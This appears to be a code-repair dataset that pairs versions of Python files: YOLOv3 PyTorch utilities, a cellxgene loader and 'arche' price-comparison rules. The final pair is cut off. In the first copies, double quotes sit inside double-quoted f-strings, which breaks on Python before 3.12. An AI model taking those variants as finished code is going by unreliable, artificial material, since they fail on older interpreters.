print(f"Downloading {r1.headers['Content-Range']} from {r1.headers['Server']}")
# Download:
open(fn, 'wb').write(get_data(presigned_url=presigned_url))
def show_summary(self):
uuid_session = str(uuid.uuid4())
display_html('<div id="{}" style="height: 600px; width:100%;"></div>'.format(uuid_session), raw=True)
display_javascript("""
require(["https://rawgit.com/caldwell/renderjson/master/renderjson.js"], function() {
document.getElementById('%s').appendChild(renderjson(%s))
});
""" % (uuid_session, json.dumps(self._collection_dataset)), raw=True)
def load(data_dir, sample_fn, adata_ids: AdataIdsCellxgene, **kwargs):
"""
Generalised load function for cellxgene-provided data sets.
This function corresponds to the dataset-wise load() functions defined in standard sfaira data loaders.
"""
fn = cellxgene_fn(dir=data_dir, dataset_id=sample_fn)
adata = anndata.read_h5ad(fn)
if adata.raw is not None: # TODO still need this?
adata.X = adata.raw.X
del adata.raw
for k in adata_ids.ontology_constrained:
col_name = getattr(adata_ids, k)
if col_name in adata.obs.columns:
adata.obs[col_name] = clean_cellxgene_meta_obs(k=k, val=adata.obs[col_name].values, adata_ids=adata_ids)
return adata
|
# YOLOv3 PyTorch utils
import datetime
import logging
import math
import os
import platform
import subprocess
import time
from contextlib import contextmanager
from copy import deepcopy
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torchvision
try:
import thop # for FLOPS computation
except ImportError:
thop = None
logger = logging.getLogger(__name__)
@contextmanager
def torch_distributed_zero_first(local_rank: int):
"""
Decorator to make all processes in distributed training wait for each local_master to do something.
"""
if local_rank not in [-1, 0]:
torch.distributed.barrier()
yield
if local_rank == 0:
torch.distributed.barrier()
def init_torch_seeds(seed=0):
# Speed-reproducibility tradeoff https://pytorch.org/docs/stable/notes/randomness.html
torch.manual_seed(seed)
if seed == 0: # slower, more reproducible
cudnn.benchmark, cudnn.deterministic = False, True
else: # faster, less reproducible
cudnn.benchmark, cudnn.deterministic = True, False
def date_modified(path=__file__):
# return human-readable file modification date, i.e. '2021-3-26'
t = datetime.datetime.fromtimestamp(Path(path).stat().st_mtime)
return f'{t.year}-{t.month}-{t.day}'
def git_describe(path=Path(__file__).parent): # path must be a directory
# return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe
s = f'git -C {path} describe --tags --long --always'
try:
return subprocess.check_output(s, shell=True, stderr=subprocess.STDOUT).decode()[:-1]
except subprocess.CalledProcessError as e:
return '' # not a git repository
def select_device(device='', batch_size=None):
# device = 'cpu' or '0' or '0,1,2,3'
if (device.lower() == 'dml'):
return torch.device('dml')
s = f'YOLOv3 🚀 {git_describe() or date_modified()} torch {torch.__version__} ' # string
cpu = device.lower() == 'cpu'
if cpu:
os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # force torch.cuda.is_available() = False
elif device: # non-cpu device requested
# os.environ['CUDA_VISIBLE_DEVICES'] = device # set environment variable
assert torch.cuda.is_available(), f'CUDA unavailable, invalid device {device} requested' # check availability
cuda = not cpu and torch.cuda.is_available()
if cuda:
devices = device.split(',') if device else range(torch.cuda.device_count()) # i.e. 0,1,6,7
n = len(devices) # device count
if n > 1 and batch_size: # check batch_size is divisible by device_count
assert batch_size % n == 0, f'batch-size {batch_size} not multiple of GPU count {n}'
space = ' ' * len(s)
for i, d in enumerate(devices):
p = torch.cuda.get_device_properties(i)
s += f"{"" if i == 0 else space}CUDA:{d} ({p.name}, {p.total_memory / 1024 ** 2}MB)\n" # bytes to MB
else:
s += 'CPU\n'
logger.info(s.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else s) # emoji-safe
return torch.device('cuda:0' if cuda else 'cpu')
def time_synchronized():
# pytorch-accurate time
if torch.cuda.is_available():
torch.cuda.synchronize()
return time.time()
def profile(x, ops, n=100, device=None):
# profile a pytorch module or list of modules. Example usage:
# x = torch.randn(16, 3, 640, 640) # input
# m1 = lambda x: x * torch.sigmoid(x)
# m2 = nn.SiLU()
# profile(x, [m1, m2], n=100) # profile speed over 100 iterations
device = device or torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
x = x.to(device)
x.requires_grad = True
print(torch.__version__, device.type, torch.cuda.get_device_properties(0) if device.type == 'cuda' else '')
print(f"\n{"Params":>12s}{"GFLOPS":>12s}{"forward (ms)":>16s}{"backward (ms)":>16s}{"input":>24s}{"output":>24s}")
for m in ops if isinstance(ops, list) else [ops]:
m = m.to(device) if hasattr(m, 'to') else m # device
m = m.half() if hasattr(m, 'half') and isinstance(x, torch.Tensor) and x.dtype is torch.float16 else m # type
dtf, dtb, t = 0., 0., [0., 0., 0.] # dt forward, backward
try:
flops = thop.profile(m, inputs=(x,), verbose=False)[0] / 1E9 * 2 # GFLOPS
except:
flops = 0
for _ in range(n):
t[0] = time_synchronized()
y = m(x)
t[1] = time_synchronized()
try:
_ = y.sum().backward()
t[2] = time_synchronized()
except: # no backward method
t[2] = float('nan')
dtf += (t[1] - t[0]) * 1000 / n # ms per op forward
dtb += (t[2] - t[1]) * 1000 / n # ms per op backward
s_in = tuple(x.shape) if isinstance(x, torch.Tensor) else 'list'
s_out = tuple(y.shape) if isinstance(y, torch.Tensor) else 'list'
p = sum(list(x.numel() for x in m.parameters())) if isinstance(m, nn.Module) else 0 # parameters
print(f'{p:12}{flops:12.4g}{dtf:16.4g}{dtb:16.4g}{str(s_in):>24s}{str(s_out):>24s}')
def is_parallel(model):
# Returns True if model is of type DP or DDP
return type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
def de_parallel(model):
# De-parallelize a model: returns single-GPU model if model is of type DP or DDP
return model.module if is_parallel(model) else model
def intersect_dicts(da, db, exclude=()):
# Dictionary intersection of matching keys and shapes, omitting 'exclude' keys, using da values
return {k: v for k, v in da.items() if k in db and not any(x in k for x in exclude) and v.shape == db[k].shape}
def initialize_weights(model):
for m in model.modules():
t = type(m)
if t is nn.Conv2d:
pass # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif t is nn.BatchNorm2d:
m.eps = 1e-3
m.momentum = 0.03
elif t in [nn.Hardswish, nn.LeakyReLU, nn.ReLU, nn.ReLU6]:
m.inplace = True
def find_modules(model, mclass=nn.Conv2d):
# Finds layer indices matching module class 'mclass'
return [i for i, m in enumerate(model.module_list) if isinstance(m, mclass)]
def sparsity(model):
# Return global model sparsity
a, b = 0., 0.
for p in model.parameters():
a += p.numel()
b += (p == 0).sum()
return b / a
def prune(model, amount=0.3):
# Prune model to requested global sparsity
import torch.nn.utils.prune as prune
print('Pruning model... ', end='')
for name, m in model.named_modules():
if isinstance(m, nn.Conv2d):
prune.l1_unstructured(m, name='weight', amount=amount) # prune
prune.remove(m, 'weight') # make permanent
print(' %.3g global sparsity' % sparsity(model))
def fuse_conv_and_bn(conv, bn):
# Fuse convolution and batchnorm layers https://tehnokv.com/posts/fusing-batchnorm-and-conv/
fusedconv = nn.Conv2d(conv.in_channels,
conv.out_channels,
kernel_size=conv.kernel_size,
stride=conv.stride,
padding=conv.padding,
groups=conv.groups,
bias=True).requires_grad_(False).to(conv.weight.device)
# prepare filters
w_conv = conv.weight.clone().view(conv.out_channels, -1)
w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))
fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))
# prepare spatial bias
b_conv = torch.zeros(conv.weight.size(0), device=conv.weight.device) if conv.bias is None else conv.bias
b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(torch.sqrt(bn.running_var + bn.eps))
fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)
return fusedconv
def model_info(model, verbose=False, img_size=640):
# Model information. img_size may be int or list, i.e. img_size=640 or img_size=[640, 320]
n_p = sum(x.numel() for x in model.parameters()) # number parameters
n_g = sum(x.numel() for x in model.parameters() if x.requires_grad) # number gradients
if verbose:
print('%5s %40s %9s %12s %20s %10s %10s' % ('layer', 'name', 'gradient', 'parameters', 'shape', 'mu', 'sigma'))
for i, (name, p) in enumerate(model.named_parameters()):
name = name.replace('module_list.', '')
print('%5g %40s %9s %12g %20s %10.3g %10.3g' %
(i, name, p.requires_grad, p.numel(), list(p.shape), p.mean(), p.std()))
try: # FLOPS
from thop import profile
stride = max(int(model.stride.max()), 32) if hasattr(model, 'stride') else 32
img = torch.zeros((1, model.yaml.get('ch', 3), stride, stride), device=next(model.parameters()).device) # input
flops = profile(deepcopy(model), inputs=(img,), verbose=False)[0] / 1E9 * 2 # stride GFLOPS
img_size = img_size if isinstance(img_size, list) else [img_size, img_size] # expand if int/float
fs = ', %.1f GFLOPS' % (flops * img_size[0] / stride * img_size[1] / stride) # 640x640 GFLOPS
except (ImportError, Exception):
fs = ''
logger.info(f"Model Summary: {len(list(model.modules()))} layers, {n_p} parameters, {n_g} gradients{fs}")
def load_classifier(name='resnet101', n=2):
# Loads a pretrained model reshaped to n-class output
model = torchvision.models.__dict__[name](pretrained=True)
# ResNet model properties
# input_size = [3, 224, 224]
# input_space = 'RGB'
# input_range = [0, 1]
# mean = [0.485, 0.456, 0.406]
# std = [0.229, 0.224, 0.225]
# Reshape output to n classes
filters = model.fc.weight.shape[1]
model.fc.bias = nn.Parameter(torch.zeros(n), requires_grad=True)
model.fc.weight = nn.Parameter(torch.zeros(n, filters), requires_grad=True)
model.fc.out_features = n
return model
def scale_img(img, ratio=1.0, same_shape=False, gs=32): # img(16,3,256,416)
# scales img(bs,3,y,x) by ratio constrained to gs-multiple
if ratio == 1.0:
return img
else:
h, w = img.shape[2:]
s = (int(h * ratio), int(w * ratio)) # new size
img = F.interpolate(img, size=s, mode='bilinear', align_corners=False) # resize
if not same_shape: # pad/crop img
h, w = [math.ceil(x * ratio / gs) * gs for x in (h, w)]
return F.pad(img, [0, w - s[1], 0, h - s[0]], value=0.447) # value = imagenet mean
def copy_attr(a, b, include=(), exclude=()):
# Copy attributes from b to a, options to only include [...] and to exclude [...]
for k, v in b.__dict__.items():
if (len(include) and k not in include) or k.startswith('_') or k in exclude:
continue
else:
setattr(a, k, v)
class ModelEMA:
""" Model Exponential Moving Average from https://github.com/rwightman/pytorch-image-models
Keep a moving average of everything in the model state_dict (parameters and buffers).
This is intended to allow functionality like
https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage
A smoothed version of the weights is necessary for some training schemes to perform well.
This class is sensitive where it is initialized in the sequence of model init,
GPU assignment and distributed training wrappers.
"""
def __init__(self, model, decay=0.9999, updates=0):
# Create EMA
self.ema = deepcopy(model.module if is_parallel(model) else model).eval() # FP32 EMA
# if next(model.parameters()).device.type != 'cpu':
# self.ema.half() # FP16 EMA
self.updates = updates # number of EMA updates
self.decay = lambda x: decay * (1 - math.exp(-x / 2000)) # decay exponential ramp (to help early epochs)
for p in self.ema.parameters():
p.requires_grad_(False)
def update(self, model):
# Update EMA parameters
with torch.no_grad():
self.updates += 1
d = self.decay(self.updates)
msd = model.module.state_dict() if is_parallel(model) else model.state_dict() # model state_dict
for k, v in self.ema.state_dict().items():
if v.dtype.is_floating_point:
v *= d
v += (1. - d) * msd[k].detach()
def update_attr(self, model, include=(), exclude=('process_group', 'reducer')):
# Update EMA attributes
copy_attr(self.ema, model, include, exclude)
| # YOLOv3 PyTorch utils
import datetime
import logging
import math
import os
import platform
import subprocess
import time
from contextlib import contextmanager
from copy import deepcopy
from pathlib import Path
import torch
import torch.backends.cudnn as cudnn
import torch.nn as nn
import torch.nn.functional as F
import torchvision
try:
import thop # for FLOPS computation
except ImportError:
thop = None
logger = logging.getLogger(__name__)
@contextmanager
def torch_distributed_zero_first(local_rank: int):
"""
Decorator to make all processes in distributed training wait for each local_master to do something.
"""
if local_rank not in [-1, 0]:
torch.distributed.barrier()
yield
if local_rank == 0:
torch.distributed.barrier()
def init_torch_seeds(seed=0):
# Speed-reproducibility tradeoff https://pytorch.org/docs/stable/notes/randomness.html
torch.manual_seed(seed)
if seed == 0: # slower, more reproducible
cudnn.benchmark, cudnn.deterministic = False, True
else: # faster, less reproducible
cudnn.benchmark, cudnn.deterministic = True, False
def date_modified(path=__file__):
# return human-readable file modification date, i.e. '2021-3-26'
t = datetime.datetime.fromtimestamp(Path(path).stat().st_mtime)
return f'{t.year}-{t.month}-{t.day}'
def git_describe(path=Path(__file__).parent): # path must be a directory
# return human-readable git description, i.e. v5.0-5-g3e25f1e https://git-scm.com/docs/git-describe
s = f'git -C {path} describe --tags --long --always'
try:
return subprocess.check_output(s, shell=True, stderr=subprocess.STDOUT).decode()[:-1]
except subprocess.CalledProcessError as e:
return '' # not a git repository
def select_device(device='', batch_size=None):
# device = 'cpu' or '0' or '0,1,2,3'
if (device.lower() == 'dml'):
return torch.device('dml')
s = f'YOLOv3 🚀 {git_describe() or date_modified()} torch {torch.__version__} ' # string
cpu = device.lower() == 'cpu'
if cpu:
os.environ['CUDA_VISIBLE_DEVICES'] = '-1' # force torch.cuda.is_available() = False
elif device: # non-cpu device requested
# os.environ['CUDA_VISIBLE_DEVICES'] = device # set environment variable
assert torch.cuda.is_available(), f'CUDA unavailable, invalid device {device} requested' # check availability
cuda = not cpu and torch.cuda.is_available()
if cuda:
devices = device.split(',') if device else range(torch.cuda.device_count()) # i.e. 0,1,6,7
n = len(devices) # device count
if n > 1 and batch_size: # check batch_size is divisible by device_count
assert batch_size % n == 0, f'batch-size {batch_size} not multiple of GPU count {n}'
space = ' ' * len(s)
for i, d in enumerate(devices):
p = torch.cuda.get_device_properties(i)
s += f"{'' if i == 0 else space}CUDA:{d} ({p.name}, {p.total_memory / 1024 ** 2}MB)\n" # bytes to MB
else:
s += 'CPU\n'
logger.info(s.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else s) # emoji-safe
return torch.device('cuda:0' if cuda else 'cpu')
def time_synchronized():
# pytorch-accurate time
if torch.cuda.is_available():
torch.cuda.synchronize()
return time.time()
def profile(x, ops, n=100, device=None):
# profile a pytorch module or list of modules. Example usage:
# x = torch.randn(16, 3, 640, 640) # input
# m1 = lambda x: x * torch.sigmoid(x)
# m2 = nn.SiLU()
# profile(x, [m1, m2], n=100) # profile speed over 100 iterations
device = device or torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
x = x.to(device)
x.requires_grad = True
print(torch.__version__, device.type, torch.cuda.get_device_properties(0) if device.type == 'cuda' else '')
print(f"\n{'Params':>12s}{'GFLOPS':>12s}{'forward (ms)':>16s}{'backward (ms)':>16s}{'input':>24s}{'output':>24s}")
for m in ops if isinstance(ops, list) else [ops]:
m = m.to(device) if hasattr(m, 'to') else m # device
m = m.half() if hasattr(m, 'half') and isinstance(x, torch.Tensor) and x.dtype is torch.float16 else m # type
dtf, dtb, t = 0., 0., [0., 0., 0.] # dt forward, backward
try:
flops = thop.profile(m, inputs=(x,), verbose=False)[0] / 1E9 * 2 # GFLOPS
except:
flops = 0
for _ in range(n):
t[0] = time_synchronized()
y = m(x)
t[1] = time_synchronized()
try:
_ = y.sum().backward()
t[2] = time_synchronized()
except: # no backward method
t[2] = float('nan')
dtf += (t[1] - t[0]) * 1000 / n # ms per op forward
dtb += (t[2] - t[1]) * 1000 / n # ms per op backward
s_in = tuple(x.shape) if isinstance(x, torch.Tensor) else 'list'
s_out = tuple(y.shape) if isinstance(y, torch.Tensor) else 'list'
p = sum(list(x.numel() for x in m.parameters())) if isinstance(m, nn.Module) else 0 # parameters
print(f'{p:12}{flops:12.4g}{dtf:16.4g}{dtb:16.4g}{str(s_in):>24s}{str(s_out):>24s}')
def is_parallel(model):
# Returns True if model is of type DP or DDP
return type(model) in (nn.parallel.DataParallel, nn.parallel.DistributedDataParallel)
def de_parallel(model):
# De-parallelize a model: returns single-GPU model if model is of type DP or DDP
return model.module if is_parallel(model) else model
def intersect_dicts(da, db, exclude=()):
# Dictionary intersection of matching keys and shapes, omitting 'exclude' keys, using da values
return {k: v for k, v in da.items() if k in db and not any(x in k for x in exclude) and v.shape == db[k].shape}
def initialize_weights(model):
for m in model.modules():
t = type(m)
if t is nn.Conv2d:
pass # nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif t is nn.BatchNorm2d:
m.eps = 1e-3
m.momentum = 0.03
elif t in [nn.Hardswish, nn.LeakyReLU, nn.ReLU, nn.ReLU6]:
m.inplace = True
def find_modules(model, mclass=nn.Conv2d):
# Finds layer indices matching module class 'mclass'
return [i for i, m in enumerate(model.module_list) if isinstance(m, mclass)]
def sparsity(model):
# Return global model sparsity
a, b = 0., 0.
for p in model.parameters():
a += p.numel()
b += (p == 0).sum()
return b / a
def prune(model, amount=0.3):
# Prune model to requested global sparsity
import torch.nn.utils.prune as prune
print('Pruning model... ', end='')
for name, m in model.named_modules():
if isinstance(m, nn.Conv2d):
prune.l1_unstructured(m, name='weight', amount=amount) # prune
prune.remove(m, 'weight') # make permanent
print(' %.3g global sparsity' % sparsity(model))
def fuse_conv_and_bn(conv, bn):
# Fuse convolution and batchnorm layers https://tehnokv.com/posts/fusing-batchnorm-and-conv/
fusedconv = nn.Conv2d(conv.in_channels,
conv.out_channels,
kernel_size=conv.kernel_size,
stride=conv.stride,
padding=conv.padding,
groups=conv.groups,
bias=True).requires_grad_(False).to(conv.weight.device)
# prepare filters
w_conv = conv.weight.clone().view(conv.out_channels, -1)
w_bn = torch.diag(bn.weight.div(torch.sqrt(bn.eps + bn.running_var)))
fusedconv.weight.copy_(torch.mm(w_bn, w_conv).view(fusedconv.weight.shape))
# prepare spatial bias
b_conv = torch.zeros(conv.weight.size(0), device=conv.weight.device) if conv.bias is None else conv.bias
b_bn = bn.bias - bn.weight.mul(bn.running_mean).div(torch.sqrt(bn.running_var + bn.eps))
fusedconv.bias.copy_(torch.mm(w_bn, b_conv.reshape(-1, 1)).reshape(-1) + b_bn)
return fusedconv
def model_info(model, verbose=False, img_size=640):
# Model information. img_size may be int or list, i.e. img_size=640 or img_size=[640, 320]
n_p = sum(x.numel() for x in model.parameters()) # number parameters
n_g = sum(x.numel() for x in model.parameters() if x.requires_grad) # number gradients
if verbose:
print('%5s %40s %9s %12s %20s %10s %10s' % ('layer', 'name', 'gradient', 'parameters', 'shape', 'mu', 'sigma'))
for i, (name, p) in enumerate(model.named_parameters()):
name = name.replace('module_list.', '')
print('%5g %40s %9s %12g %20s %10.3g %10.3g' %
(i, name, p.requires_grad, p.numel(), list(p.shape), p.mean(), p.std()))
try: # FLOPS
from thop import profile
stride = max(int(model.stride.max()), 32) if hasattr(model, 'stride') else 32
img = torch.zeros((1, model.yaml.get('ch', 3), stride, stride), device=next(model.parameters()).device) # input
flops = profile(deepcopy(model), inputs=(img,), verbose=False)[0] / 1E9 * 2 # stride GFLOPS
img_size = img_size if isinstance(img_size, list) else [img_size, img_size] # expand if int/float
fs = ', %.1f GFLOPS' % (flops * img_size[0] / stride * img_size[1] / stride) # 640x640 GFLOPS
except (ImportError, Exception):
fs = ''
logger.info(f"Model Summary: {len(list(model.modules()))} layers, {n_p} parameters, {n_g} gradients{fs}")
def load_classifier(name='resnet101', n=2):
# Loads a pretrained model reshaped to n-class output
model = torchvision.models.__dict__[name](pretrained=True)
# ResNet model properties
# input_size = [3, 224, 224]
# input_space = 'RGB'
# input_range = [0, 1]
# mean = [0.485, 0.456, 0.406]
# std = [0.229, 0.224, 0.225]
# Reshape output to n classes
filters = model.fc.weight.shape[1]
model.fc.bias = nn.Parameter(torch.zeros(n), requires_grad=True)
model.fc.weight = nn.Parameter(torch.zeros(n, filters), requires_grad=True)
model.fc.out_features = n
return model
def scale_img(img, ratio=1.0, same_shape=False, gs=32): # img(16,3,256,416)
# scales img(bs,3,y,x) by ratio constrained to gs-multiple
if ratio == 1.0:
return img
else:
h, w = img.shape[2:]
s = (int(h * ratio), int(w * ratio)) # new size
img = F.interpolate(img, size=s, mode='bilinear', align_corners=False) # resize
if not same_shape: # pad/crop img
h, w = [math.ceil(x * ratio / gs) * gs for x in (h, w)]
return F.pad(img, [0, w - s[1], 0, h - s[0]], value=0.447) # value = imagenet mean
def copy_attr(a, b, include=(), exclude=()):
# Copy attributes from b to a, options to only include [...] and to exclude [...]
for k, v in b.__dict__.items():
if (len(include) and k not in include) or k.startswith('_') or k in exclude:
continue
else:
setattr(a, k, v)
class ModelEMA:
""" Model Exponential Moving Average from https://github.com/rwightman/pytorch-image-models
Keep a moving average of everything in the model state_dict (parameters and buffers).
This is intended to allow functionality like
https://www.tensorflow.org/api_docs/python/tf/train/ExponentialMovingAverage
A smoothed version of the weights is necessary for some training schemes to perform well.
This class is sensitive where it is initialized in the sequence of model init,
GPU assignment and distributed training wrappers.
"""
def __init__(self, model, decay=0.9999, updates=0):
# Create EMA
self.ema = deepcopy(model.module if is_parallel(model) else model).eval() # FP32 EMA
# if next(model.parameters()).device.type != 'cpu':
# self.ema.half() # FP16 EMA
self.updates = updates # number of EMA updates
self.decay = lambda x: decay * (1 - math.exp(-x / 2000)) # decay exponential ramp (to help early epochs)
for p in self.ema.parameters():
p.requires_grad_(False)
def update(self, model):
# Update EMA parameters
with torch.no_grad():
self.updates += 1
d = self.decay(self.updates)
msd = model.module.state_dict() if is_parallel(model) else model.state_dict() # model state_dict
for k, v in self.ema.state_dict().items():
if v.dtype.is_floating_point:
v *= d
v += (1. - d) * msd[k].detach()
def update_attr(self, model, include=(), exclude=('process_group', 'reducer')):
# Update EMA attributes
copy_attr(self.ema, model, include, exclude)
|
from arche.readers.schema import TaggedFields
from arche.rules.result import Result
from arche.tools.helpers import is_number, ratio_diff
import pandas as pd
def compare_was_now(df: pd.DataFrame, tagged_fields: TaggedFields):
"""Compare price_was and price_now tagged fields"""
price_was_fields = tagged_fields.get("product_price_was_field")
price_fields = tagged_fields.get("product_price_field")
items_number = len(df.index)
result = Result("Compare Price Was And Now")
if (
price_was_fields
and price_was_fields[0] in df.columns
and price_fields
and price_fields[0] in df.columns
):
price_field = price_fields[0]
price_was_field = price_was_fields[0]
prices = df.copy()
prices[price_was_field] = prices[price_was_field].astype(float)
prices[price_field] = prices[price_field].astype(float)
df_prices_less = pd.DataFrame(
prices[prices[price_was_field] < prices[price_field]],
columns=["_key", price_was_field, price_field],
)
price_less_percent = "{:.2%}".format(len(df_prices_less) / items_number)
if not df_prices_less.empty:
error = f"Past price is less than current for {len(df_prices_less)} items"
result.add_error(
f"{price_less_percent} ({len(df_prices_less)}) of "
f"items with {price_was_field} < {price_field}",
detailed=f"{error}:\n{list(df_prices_less["_key"])}",
)
df_prices_equals = pd.DataFrame(
prices[prices[price_was_field] == prices[price_field]],
columns=["_key", price_was_field, price_field],
)
price_equal_percent = "{:.2%}".format(len(df_prices_equals) / items_number)
if not df_prices_equals.empty:
result.add_warning(
(
f"{price_equal_percent} ({len(df_prices_equals)}) "
f"of items with {price_was_field} = {price_field}"
),
detailed=(
f"Prices equal for {len(df_prices_equals)} items:\n"
f"{list(df_prices_equals["_key"])}"
),
)
result.err_items_count = len(df_prices_equals) + len(df_prices_less)
result.items_count = len(df.index)
else:
result.add_info(
"product_price_field or product_price_was_field tags were not "
"found in schema"
)
return result
def compare_prices_for_same_urls(
source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
"""For each pair of items that have the same `product_url_field` tagged field,
compare `product_price_field` field
Returns:
A result containing pairs of items with same `product_url_field`
from `source_df` and `target_df` which `product_price_field` differ,
missing and new `product_url_field` tagged fields.
"""
result = Result("Compare Prices For Same Urls")
url_field = tagged_fields.get("product_url_field")
if not url_field:
result.add_info("product_url_field tag is not set")
return result
url_field = url_field[0]
price_field = tagged_fields.get("product_price_field")
source_df = source_df.dropna(subset=[url_field])
target_df = target_df.dropna(subset=[url_field])
same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
url_field
]
new_urls = source_df[~(source_df[url_field].isin(target_df[url_field].values))][
url_field
]
missing_urls = target_df[(~target_df[url_field].isin(source_df[url_field].values))][
url_field
]
missing_detailed_messages = []
for url in missing_urls:
key = target_df.loc[target_df[url_field] == url]["_key"].iloc[0]
missing_detailed_messages.append(f"Missing {url} from {key}")
result.add_info(
f"{len(missing_urls)} urls missing from the tested job",
detailed="\n".join(missing_detailed_messages),
)
result.add_info(f"{len(new_urls)} new urls in the tested job")
result.add_info(f"{len(same_urls)} same urls in both jobs")
diff_prices_count = 0
if not price_field:
result.add_info("product_price_field tag is not set")
else:
price_field = price_field[0]
detailed_messages = []
for url in same_urls:
if url.strip() != "nan":
source_price = source_df[source_df[url_field] == url][price_field].iloc[
0
]
target_price = target_df[target_df[url_field] == url][price_field].iloc[
0
]
if (
is_number(source_price)
and is_number(target_price)
and ratio_diff(source_price, target_price) > 0.1
):
diff_prices_count += 1
source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
msg = (
f"different prices for url: {url}\nsource price is {source_price} "
f"for {source_key}\ntarget price is {target_price} for {target_key}"
)
detailed_messages.append(msg)
res = f"{len(same_urls)} checked, {diff_prices_count} errors"
if detailed_messages:
result.add_error(res, detailed="\n".join(detailed_messages))
else:
result.add_info(res)
return result
def compare_names_for_same_urls(
source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
"""For each pair of items that have the same `product_url_field` tagged field,
compare `name_field` field"""
result = Result("Compare Names Per Url")
url_field = tagged_fields.get("product_url_field")
if not url_field:
result.add_info("product_url_field tag is not set")
return result
url_field = url_field[0]
name_field = tagged_fields.get("name_field")
diff_names_count = 0
if not name_field:
result.add_info("name_field tag is not set")
return result
name_field = name_field[0]
if any(
[
name_field not in source_df.columns.values,
name_field not in target_df.columns.values,
]
):
return
same_urls = source_df[(source_df[url_field].isin(target_df[url_field].values))][
url_field
]
detailed_messages = []
for url in same_urls:
if url.strip() != "nan":
source_name = source_df[source_df[url_field] == url][name_field].iloc[0]
target_name = target_df[target_df[url_field] == url][name_field].iloc[0]
if (
source_name != target_name
and source_name.strip() != "nan"
and target_name.strip() != "nan"
):
diff_names_count += 1
source_key = source_df[source_df[url_field] == url]["_key"].iloc[0]
target_key = target_df[target_df[url_field] == url]["_key"].iloc[0]
msg = (
f"different names for url: {url}\nsource name is {source_name} "
f"for {source_key}\ntarget name is {target_name} for {target_key}"
)
detailed_messages.append(msg)
res = f"{len(same_urls)} checked, {diff_names_count} errors"
if detailed_messages:
result.add_error(res, detailed="\n".join(detailed_messages))
else:
result.add_info(res)
return result
def compare_prices_for_same_names(
source_df: pd.DataFrame, target_df: pd.DataFrame, tagged_fields: TaggedFields
):
result = Result("Compare Prices For Same Names")
name_field = tagged_fields.get("name_field")
if not name_field:
result.add_info("name_field tag is not set")
return result
name_field = name_field[0]
product_url_field = tagged_fields.get("product_url_field")
if not product_url_field:
result.add_info("product_url_field tag is not set")
else:
product_url_field = product_url_field[0]
source_df = source_df[source_df[name_field].notnull()]
target_df = target_df[target_df[name_field].notnull()]
same_names = source_df[(source_df[name_field].isin(target_df[name_field].values))][
name_field
]
new_names = source_df[~(source_df[name_field].isin(target_df[name_field].values))][
name_field
]
missing_names = target_df[
~(target_df[name_field].isin(source_df[name_field].values))
][name_field]
detailed_messages = []
for name in missing_names:
target_key = target_df.loc[target_df[name_field] == name]["_key"].iloc[0]
msg = f"Missing {name} from {target_key}"
if product_url_field:
url = target_df.loc[target_df[name_field] == name][product_url_field].iloc[
0
]
detailed_messages.append(f"{msg}\n{url}")
result.add_info(
f"{len(missing_names)} names missing from the tested job",
detailed="\n".join(detailed_messages),
)
result.add_info(f"{len(new_names)} new names in the tested job")
result.add_info(f"{len(same_names)} same names in both jobs")
price_tag = "product_price_field"
price_field = tagged_fields.get(price_tag)
if not price_field:
result.add_info("product_price_field tag is not set")
return result
price_field = price_field[0]
count = 0
detailed_messages = []
for name in same_names:
if name.strip() != "nan":
source_price = source_df[source_df[name_field] == name][price_field].iloc[0]
target_price = target_df[target_df[name_field] == name][price_field].iloc[0]
if is_number(source_price) and is_number(target_price):
if ratio_diff(source_price, target_price) > 0.1:
count += 1
source_key = source_df[source_df[name_field] == name]["_key"].iloc[
0
]
target_key = target_df[target_df[name_field] == name]["_key"].iloc[
0
]
msg = (
f"different price for {name}\nsource price is {source_price} "
f"for {source_key}\ntarget price is {target_price} for {target_key}"
)
detailed_messages.append(msg)
result_msg = f"{len(same_names)} checked, {count} errors"
if detailed_messages:
result.add_error(result_msg, detailed="\n".join(detailed_messages))
else:
result.add_info(result_msg)
return result
| from arche.readers.schema import TaggedFields
from arche.rules.result import Result
from arche.tools.helpers import is_number, ratio_diff
import pandas as pd
def compare_was_now(df: pd.DataFrame, tagged_fields: TaggedFields):
"""Compare price_was and price_now tagged fields"""
price_was_fields = tagged_fields.get("product_price_was_field")
price_fields = tagged_fields.get("product_price_field")
items_number = len(df.index)
result = Result("Compare Price Was And Now")
if (
price_was_fields
and price_was_fields[0] in df.columns
and price_fields
and price_fields[0] in df.columns
):
price_field = price_fields[0]
price_was_field = price_was_fields[0]
prices = df.copy()
prices[price_was_field] = prices[price_was_field].astype(float)
prices[price_field] = prices[price_field].astype(float)
df_prices_less = pd.DataFrame(
prices[prices[price_was_field] < prices[price_field]],
columns=["_key", price_was_field, price_field],
)
price_less_percent = "{:.2%}".format(len(df_prices_less) / items_number)
if not df_prices_less.empty:
error = f"Past price is less than current for {len(df_prices_less)} items"
result.add_error(
f"{price_less_percent} ({len(df_prices_less)}) of "
f"items with {price_was_field} < {price_field}",
detailed=f"{error}:\n{list(df_prices_less['_key'])}",
)
df_prices_equals = pd.DataFrame(
prices[prices[price_was_field] == prices[price_field]],
columns=["_key", price_was_field, price_field],
)
price_equal_percent = "{:.2%}".format(len(df_prices_equals) / items_number)
if not df_prices_equals.empty:
result.add_warning(
(
f"{price_equal_percent} ({len(df_prices_equals)}) "
